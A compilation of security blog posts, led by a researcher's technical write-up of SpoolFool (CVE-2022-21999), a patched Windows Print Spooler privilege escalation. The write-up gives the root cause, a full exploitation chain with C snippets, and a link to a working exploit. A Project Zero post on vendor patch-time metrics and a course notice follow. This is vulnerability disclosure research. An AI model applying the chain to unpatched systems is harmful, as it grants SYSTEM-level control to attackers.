
SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)

8 February 2022 at 20:21

UPDATE (Feb 9, 2022): Microsoft initially patched this vulnerability without giving me any information or acknowledgement, and as such, at the time of patch release, I thought that the vulnerability was identified as CVE-2022-22718, since it was the only Print Spooler vulnerability in the release without any acknowledgement. I contacted Microsoft for clarification, and the day after the patch release, Institut For Cyber Risk and I were acknowledged for CVE-2022-21999.

In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and reported in November 2021. The vulnerability got patched as part of Microsoft’s Patch Tuesday in February 2022. We’ll take a quick tour of the components and inner workings of the Print Spooler, and then we’ll dive into the vulnerability with root cause, code snippets, images and much more. At the end of the blog post, you can also find a link to a functional exploit.

Background

Back in May 2020, Microsoft patched a Windows Print Spooler privilege escalation vulnerability. The vulnerability was assigned CVE-2020–1048, and Microsoft acknowledged Peleg Hadar and Tomer Bar of SafeBreach Labs for reporting the security issue. On the same day of the patch release, Yarden Shafir and Alex Ionescu published a technical write-up of the vulnerability. In essence, a user could write to an arbitrary file by creating a printer port that pointed to a file on disk. After the vulnerability (CVE-2020–1048) had been patched, the Print Spooler would now check if the user had permissions to create or write to the file before adding the port. A week after the release of the patch and blog post, Paolo Stagno (aka VoidSec) privately disclosed a bypass for CVE-2020–1048 to Microsoft. The bypass was patched three months later in August 2020, and Microsoft acknowledged eight independent entities for reporting the vulnerability, which was identified as CVE-2020–1337. The bypass for the vulnerability used a directory junction (symbolic link) to circumvent the security check. Suppose a user created the directory C:\MyFolder\ and configured a printer port to point to the file C:\MyFolder\Port. This operation would be granted, since the user is indeed allowed to create C:\MyFolder\Port. Now, what would happen if the user then turned C:\MyFolder\ into a directory junction that pointed to C:\Windows\System32\ after the port had been created? Well, the Spooler would simply write to the file C:\Windows\System32\Port.

These two vulnerabilities, CVE-2020–1048 and CVE-2020–1337, were patched in May and August 2020, respectively. In September 2020, Microsoft patched a different vulnerability in the Print Spooler. In short, this vulnerability allowed users to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a printer. What was the patch? Almost the same story: After the patch, the Print Spooler would now check if the user had permissions to create the directory before setting the SpoolDirectory property on a printer. Perhaps you can already see where this post is going. Let’s start at the beginning.

Introduction to Spooler Components

The Windows Print Spooler is a built-in component on all Windows workstations and servers, and it is the primary component of the printing interface. The Print Spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The Spooler is loaded at system startup and continues to run until the operating system is shut down. The primary components of the Print Spooler are illustrated in the following diagram.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components

Application

The print application creates a print job by calling Graphics Device Interface (GDI) functions or directly into winspool.drv.

GDI

The Graphics Device Interface (GDI) includes both user-mode and kernel-mode components for graphics support.

winspool.drv

winspool.drv is the client interface into the Spooler. It exports the functions that make up the Spooler’s Win32 API, and provides RPC stubs for accessing the server.

spoolsv.exe

spoolsv.exe is the Spooler’s API server. It is implemented as a service that is started when the operating system is started. This module exports an RPC interface to the server side of the Spooler’s Win32 API. Clients of spoolsv.exe include winspool.drv (locally) and win32spl.dll (remotely). The module implements some API functions, but most function calls are passed to a print provider by means of the router (spoolss.dll).

Router

The router, spoolss.dll, determines which print provider to call, based on a printer name or handle supplied with each function call, and passes the function call to the correct provider.

Print Provider

The print provider that supports the specified print device.

Local Print Provider

The local print provider provides job control and printer management capabilities for all printers that are accessed through the local print provider’s port monitors.

The following diagram provides a view of control flow among the local printer provider’s components, when an application creates a print job.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-print-providers

While this control flow is rather large, we will mostly focus on the local print provider localspl.dll.

Vulnerability

The vulnerability consists of two bypasses for CVE-2020–1030. I highly recommend reading Victor Mata’s blog post on CVE-2020–1030, but I’ll try to cover the important parts as well.

When a user prints a document, a print job is spooled to a predefined location referred to as the “spool directory”. The spool directory is configurable on each printer and it must allow the FILE_ADD_FILE permission to all users.

Permissions of the default spool directory

Individual spool directories are supported by defining the SpoolDirectory value in a printer’s registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>.

The Print Spooler provides APIs for managing configuration data such as EnumPrinterData, GetPrinterData, SetPrinterData, and DeletePrinterData. Underneath, these functions perform registry operations relative to the printer’s key.

We can modify a printer’s configuration with SetPrinterDataEx. This function requires a printer to be opened with the PRINTER_ACCESS_ADMINISTER access right. If the current user doesn’t have permission to open an existing printer with the PRINTER_ACCESS_ADMINISTER access right, there are two options:

  • The user can create a new local printer
  • The user can add a remote printer

By default, users in the INTERACTIVE group have the “Manage Server” permission and can therefore create new local printers, as shown below.

Security of the local print server on Windows desktops

However, it seems that this permission is only granted on Windows desktops, such as Windows 10 and Windows 11. During my testing on Windows servers, this permission was not present. Nonetheless, it was still possible for users without the “Manage Server” permission to add remote printers.

If a user adds a remote printer, the printer will inherit the security properties of the shared printer from the printer server. As such, if the remote printer server allows Everyone to manage the printer, then it’s possible to obtain a handle to the printer with the PRINTER_ACCESS_ADMINISTER access right, and SetPrinterDataEx would update the local registry as usual. A user could therefore create a shared printer on a different server or workstation, and grant Everyone the right to manage the printer. On the victim server, the user could then add the remote printer, which would now be manageable by Everyone. While I haven’t fully tested how this vulnerability behaves on remote printers, it could be a viable option for situations where the user cannot create or manage a local printer. But please note that while some operations are handled by the local print provider, others are handled by the remote print provider.

When we have opened or created a printer with the PRINTER_ACCESS_ADMINISTER access right, we can configure the SpoolDirectory on it.
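To make this concrete, here is a minimal, hedged C sketch of the step above: open the printer with PRINTER_ACCESS_ADMINISTER and point its SpoolDirectory at a user-controlled path. The printer name is the one the exploit creates later, and the pKeyName value used to address the printer's root registry key is an assumption, so refer to the exploit repository for the exact call.

// Hedged sketch, not the exact exploit code. Link against winspool.lib.
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "winspool.lib")

int wmain(void)
{
    PRINTER_DEFAULTSW defaults = { 0 };
    defaults.DesiredAccess = PRINTER_ACCESS_ADMINISTER;

    HANDLE hPrinter = NULL;
    if (!OpenPrinterW(L"Microsoft XPS Document Writer v4", &hPrinter, &defaults)) {
        wprintf(L"OpenPrinter failed: %lu\n", GetLastError());
        return 1;
    }

    // SplSetPrinterDataEx validates that we can create/open this directory before
    // it writes the SpoolDirectory value under the printer's registry key.
    WCHAR spoolDir[] = L"C:\\spooldir\\printers\\";   // illustrative path from the text
    DWORD status = SetPrinterDataExW(hPrinter,
                                     L"\\",           // assumed key name for the printer's root key
                                     L"SpoolDirectory",
                                     REG_SZ,
                                     (BYTE *)spoolDir,
                                     sizeof(spoolDir));
    wprintf(L"SetPrinterDataEx returned %lu\n", status);

    ClosePrinter(hPrinter);
    return 0;
}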

When calling SetPrinterDataEx, an RPC request will be sent to the local Print Spooler spoolsv.exe, which will route the request to the local print provider’s implementation in localspl.dll!SplSetPrinterDataEx. The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue

In the case of setting the SpoolDirectory value, localspl.dll!SplSetPrinterDataEx will verify that the provided directory is valid before updating the registry key. This check was not present before CVE-2020–1030.

localspl.dll!SplSetPrinterDataEx

Given a path to a directory, localspl.dll!IsValidSpoolDirectory will call localspl.dll!AdjustFileName to convert the path into a canonical path. For instance, the canonical path for C:\spooldir\ would be \\?\C:\spooldir\, and if C:\spooldir\ is a symbolic link to C:\Windows\System32\, the canonical path would be \\?\C:\Windows\System32\. Then, localspl.dll!IsValidSpoolDirectory will check if the current user is allowed to open or create the directory with GENERIC_WRITE access right. If the directory was successfully created or opened, the function will make a final check that the number of links to the directory is not greater than 1, as returned by GetFileInformationByHandle.

localspl.dll!IsValidSpoolDirectory

So in order to set the SpoolDirectory, the user must be able to create or open the directory with writable permissions. If the validation succeeds, the print provider will update the printer’s SpoolDirectory registry key. However, the spool directory will not be created by the Print Spooler until it has been reinitialized. This means that we will need to figure out how to restart the Spooler service (we will come back to this part), but it also means that the user only needs to be able to create the directory during the validation when setting the SpoolDirectory registry key — and not when the directory is actually created.

In order to bypass the validation, we can use reparse points (directory junctions in this case). Suppose we create a directory named C:\spooldir\, and we set the SpoolDirectory to C:\spooldir\printers\. The Spooler will check that the user can create the directory printers inside of C:\spooldir\. The validation passes, and the SpoolDirectory gets set to C:\spooldir\printers\. After we have configured the SpoolDirectory, we can convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\. When the Spooler initializes, the directory C:\Windows\System32\printers\ will be created with writable permissions for everyone. If the directory already exists, the Spooler will not set writable permissions on the folder.
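A hedged sketch of the junction step, assuming the directories from the example above, is shown below. The actual exploit sets the reparse point with FSCTL_SET_REPARSE_POINT; shelling out to cmd.exe's mklink /J builtin is a simpler stand-in with the same effect.

// Hedged sketch: after SpoolDirectory has been validated and set, turn the base
// directory into a directory junction so the spool directory resolves elsewhere.
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

int wmain(void)
{
    // mklink /J creates the junction directory itself, so the placeholder directory
    // (which must be empty) has to be removed first.
    if (!RemoveDirectoryW(L"C:\\spooldir")) {
        wprintf(L"RemoveDirectory failed: %lu\n", GetLastError());
    }

    // From now on, C:\spooldir\printers\ canonicalizes to
    // \\?\C:\Windows\System32\printers\, which the Spooler will create with a
    // permissive DACL the next time it initializes.
    int rc = _wsystem(L"cmd /c mklink /J C:\\spooldir C:\\Windows\\System32");
    wprintf(L"mklink returned %d\n", rc);
    return 0;
}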

As such, we need to find an interesting place to create a directory. One such place is C:\Windows\System32\spool\drivers\x64\, also known as the printer driver directory (the architecture-specific subdirectory name differs on other architectures). The printer driver directory is particularly interesting, because if we call SetPrinterDataEx with the CopyFiles registry key, the Spooler will automatically load the DLL assigned in the Module value, provided the Module file path is allowed.

This event is triggered when pszKeyName begins with the CopyFiles\ string. It initiates a sequence of functions leading to LoadLibrary.

localspl.dll!SplSetPrinterDataEx

The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue
  • 3. localspl.dll!SplCopyFileEvent is called if pszKeyName argument begins with CopyFiles\ string
  • 4. localspl.dll!SplCopyFileEvent reads the Module value from printer’s CopyFiles registry key and passes the string to localspl.dll!SplLoadLibraryTheCopyFileModule
  • 5. localspl.dll!SplLoadLibraryTheCopyFileModule performs validation on the Module file path
  • 6. If validation passes, localspl.dll!SplLoadLibraryTheCopyFileModule attempts to load the module with LoadLibrary
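A hedged C sketch of triggering this code path is shown below. The CopyFiles subkey name is arbitrary, and the DLL path is the illustrative one used later in the post. Pointing the Module value at C:\Windows\System32\AppVTerminator.dll instead is the trick used further down to crash and restart the Spooler.

// Hedged sketch: write a Module value under a key beginning with "CopyFiles\" so that
// SplLoadLibraryTheCopyFileModule ends up calling LoadLibrary on our DLL.
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "winspool.lib")

int wmain(void)
{
    PRINTER_DEFAULTSW defaults = { 0 };
    defaults.DesiredAccess = PRINTER_ACCESS_ADMINISTER;

    HANDLE hPrinter = NULL;
    if (!OpenPrinterW(L"Microsoft XPS Document Writer v4", &hPrinter, &defaults)) {
        wprintf(L"OpenPrinter failed: %lu\n", GetLastError());
        return 1;
    }

    // The path must pass IsModuleFilePathAllowed: directly inside System32, or
    // anywhere under the printer driver directory.
    WCHAR dllPath[] = L"C:\\Windows\\System32\\spool\\drivers\\x64\\printers\\payload.dll";
    DWORD status = SetPrinterDataExW(hPrinter,
                                     L"CopyFiles\\Payload",   // any subkey under CopyFiles\ triggers the event
                                     L"Module",
                                     REG_SZ,
                                     (BYTE *)dllPath,
                                     sizeof(dllPath));
    wprintf(L"SetPrinterDataEx returned %lu\n", status);

    ClosePrinter(hPrinter);
    return 0;
}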

The validation steps consist of localspl.dll!MakeCanonicalPath and localspl.dll!IsModuleFilePathAllowed. The function localspl.dll!MakeCanonicalPath will take a path and convert it into a canonical path, as described earlier.

localspl.dll!MakeCanonicalPath

localspl.dll!IsModuleFilePathAllowed will validate that the canonical path either resides directly inside of C:\Windows\System32\ or within the printer driver directory. For instance, C:\Windows\System32\payload.dll would be allowed, whereas C:\Windows\System32\Tasks\payload.dll would not. Any path inside of the printer driver directory is allowed, e.g. C:\Windows\System32\spool\drivers\x64\my\path\to\payload.dll is allowed. If we are able to create a DLL in C:\Windows\System32\ or anywhere in the printer driver directory, we can load the DLL into the Spooler service.

localspl.dll!SplLoadLibraryTheCopyFileModule

Now, we know that we can use the SpoolDirectory to create an arbitrary directory with writable permissions for all users, and that we can load any DLL into the Spooler service that resides in either C:\Windows\System32\ or the printer driver directory. There is only one issue though. As mentioned earlier, the spool directory is created during the Spooler initialization. The spool directory is created when localspl.dll!SplCreateSpooler calls localspl.dll!BuildPrinterInfo. Before localspl.dll!BuildPrinterInfo allows Everybody the FILE_ADD_FILE permission, a final check is made to make sure that the directory path does not reside within the printer driver directory.

localspl.dll!BuildPrinterInfo

This means that a security check during the Spooler initialization verifies that the SpoolDirectory value does not point inside of the printer driver directory. If it does, the Spooler will not create the spool directory and simply fallback to the default spool directory. This security check was also implemented in the patch for CVE-2020-1030.

To summarize, in order to load the DLL with localspl.dll!SplLoadLibraryTheCopyFileModule, the DLL must reside inside of the printer driver directory or directly inside of C:\Windows\System32\. To create the writable directory during Spooler initialization, the directory must not reside inside of the printer driver directory. Both localspl.dll!SplLoadLibraryTheCopyFileModule and localspl.dll!BuildPrinterInfo check if the path points inside the printer driver directory. In the first case, we must make sure that the DLL path begins with C:\Windows\System32\spool\drivers\x64\, and in the second case, we must make sure that the directory path does not begin with C:\Windows\System32\spool\drivers\x64\.

During both checks, the SpoolDirectory is converted to a canonical path, so even if we set the SpoolDirectory to C:\spooldir\printers\ and then convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\spool\drivers\x64\, the canonical path will still become \\?\C:\Windows\System32\spool\drivers\x64\printers\. The check is done by stripping off the first four characters of the canonical path, i.e. \\?\C:\Windows\System32\spool\drivers\x64\printers\ becomes C:\Windows\System32\spool\drivers\x64\printers\, and then checking if the path begins with the printer driver directory C:\Windows\System32\spool\drivers\x64\. And so, here comes the second bug to pass both checks.

If we set the spooler directory to a UNC path, such as \\localhost\C$\spooldir\printers\ (and C:\spooldir\ is a reparse point to C:\Windows\System32\spool\drivers\x64\), the canonical path will become \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\, and during comparison, the first four bytes are stripped, so UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ is compared to C:\Windows\System32\spool\drivers\x64\ and will no longer match. When the Spooler initializes, the directory \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ will be created with writable permissions. We can now write our DLL into C:\Windows\System32\spool\drivers\x64\printers\payload.dll. We can then trigger the localspl.dll!SplLoadLibraryTheCopyFileModule, but this time, we can just specify the path normally as C:\Windows\System32\spool\drivers\x64\printers\payload.dll.

We now have the primitives to create a writable directory inside of the printer driver directory and to load a DLL within the driver directory into the Spooler service. The only thing left is to restart the Spooler service such that the directory will be created. We could wait for the server to be restarted, but there is a technique to terminate the service and rely on the recovery to restart it. By default, the Spooler service will restart on the first two “crashes”, but not on subsequent failures.

To terminate the service, we can use localspl.dll!SplLoadLibraryTheCopyFileModule to load C:\Windows\System32\AppVTerminator.dll. When loaded into Spooler, the library calls TerminateProcess which subsequently kills the spoolsv.exe process. This event triggers the recovery mechanism in the Service Control Manager which in turn starts a new Spooler process. This technique was explained for CVE-2020-1030 by Victor Mata from Accenture.

Here’s a full exploit in action. The DLL used in this example will create a new local administrator named “admin”. The DLL can also be found in the exploit repository.

SpoolFool in action

The steps for the exploit are the following:

  • Create a temporary base directory that will be used for our spool directory, which we’ll later turn into a reparse point
  • Create a new local printer named “Microsoft XPS Document Writer v4”
  • Set the spool directory of our new printer to be our temporary base directory
  • Create a reparse point on our temporary base directory to point to the printer driver directory
  • Force the Spooler to restart to create the directory by loading AppVTerminator.dll into the Spooler
  • Write DLL into the new directory inside of the printer driver directory
  • Load the DLL into the Spooler

Remember that it is sufficient to create the driver directory only once in order to load as many DLLs as desired. There’s no need to trigger the exploit multiple times; doing so will most likely end up killing the Spooler service until a reboot brings it back up. When the driver directory has been created, it is possible to keep writing and loading DLLs from the directory without restarting the Spooler service. The exploit that can be found at the end of this post will check if the driver directory already exists, and if so, the exploit will skip the creation of the directory and jump straight to writing and loading the DLL. The second run of the exploit can be seen below.

Second run of SpoolFool

The functional exploit and DLL can be found here: https://github.com/ly4k/SpoolFool.

Conclusion

That’s it. Microsoft has officially released a patch. When I initially found out that there was a check during the actual creation of the directory as well, I started looking into other interesting places to create a directory. I found this post by Jonas L from Secret Club, where the Windows Error Reporting Service (WER) is abused to exploit an arbitrary directory creation primitive. However, that technique didn’t seem to work reliably on my Windows 10 machine. The SplLoadLibraryTheCopyFileModule technique, on the other hand, is very reliable, but it assumes that the user can manage a printer, which is already a requirement for this vulnerability.

Patch Analysis

[Feb 08, 2022]

A quick check with Process Monitor reveals that the SpoolDirectory is no longer created when the Spooler initializes. If the directory does not exist, the Print Spooler falls back to the default spool directory.

To be continued…

Disclosure Timeline

  • Nov 12, 2021: Reported to Microsoft Security Response Center (MSRC)
  • Nov 15, 2021: Case opened and assigned
  • Nov 19, 2021: Review and reproduction
  • Nov 22, 2021: Microsoft starts developing a patch for the vulnerability
  • Jan 21, 2022: The patch is ready for release
  • Feb 08, 2022: Patch is silently released. No acknowledgement or information received from Microsoft
  • Feb 09, 2022: Microsoft gives acknowledgement to me and Institut For Cyber Risk for CVE-2022-21999

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999) was originally published in IFCR on Medium.

First!

8 February 2022 at 17:38

Today we are launching the IFCR research blog. The ambition is to provide original research and new technical ideas and approaches to the offensive security community.

New material will be added occasionally, not on a defined schedule. That being said, we’ve already got quite a few interesting posts lined up.

Stay tuned for more…!

The IFCR Offensive Ops Team


First! was originally published in IFCR on Medium.

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor      Total bugs   Fixed by day 90   Fixed during grace period   Exceeded deadline & grace period   Avg days to fix
Apple       84           73 (87%)          7 (8%)                      4 (5%)                             69
Microsoft   80           61 (76%)          15 (19%)                    4 (5%)                             83
Google      56           53 (95%)          2 (4%)                      1 (2%)                             44
Linux       25           24 (96%)          0 (0%)                      1 (4%)                             25
Adobe       19           15 (79%)          4 (21%)                     0 (0%)                             65
Mozilla     10           9 (90%)           1 (10%)                     0 (0%)                             46
Samsung     10           8 (80%)           2 (20%)                     0 (0%)                             72
Oracle      7            3 (43%)           0 (0%)                      4 (57%)                            109
Others*     55           48 (87%)          3 (5%)                      4 (7%)                             44
TOTAL       346          294 (84%)         34 (10%)                    18 (5%)                            61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor      Bugs in 2019 (avg days to fix)   Bugs in 2020 (avg days to fix)   Bugs in 2021 (avg days to fix)
Apple       61 (71)                          13 (63)                          11 (64)
Microsoft   46 (85)                          18 (87)                          16 (76)
Google      26 (49)                          13 (22)                          17 (53)
Linux       12 (32)                          8 (22)                           5 (15)
Others*     54 (63)                          35 (54)                          14 (29)
TOTAL       199 (67)                         87 (54)                          63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly higher average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor              Total bugs   Avg fix time
iOS                 76           70
Android (Samsung)   10           72
Android (Pixel)     6            72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser   Bugs   Avg days from bug report to public patch   Avg days from public patch to release   Avg days from bug report to release
Chrome    40     5.3                                         24.6                                    29.9
WebKit    27     11.6                                        61.1                                    72.7
Firefox   8      16.6                                        21.1                                    37.8
Total     75     8.8                                         37.3                                    46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch delivery, effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we’re pleased with the acceleration of patches landing, as well as the recent lack of grace period use and missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

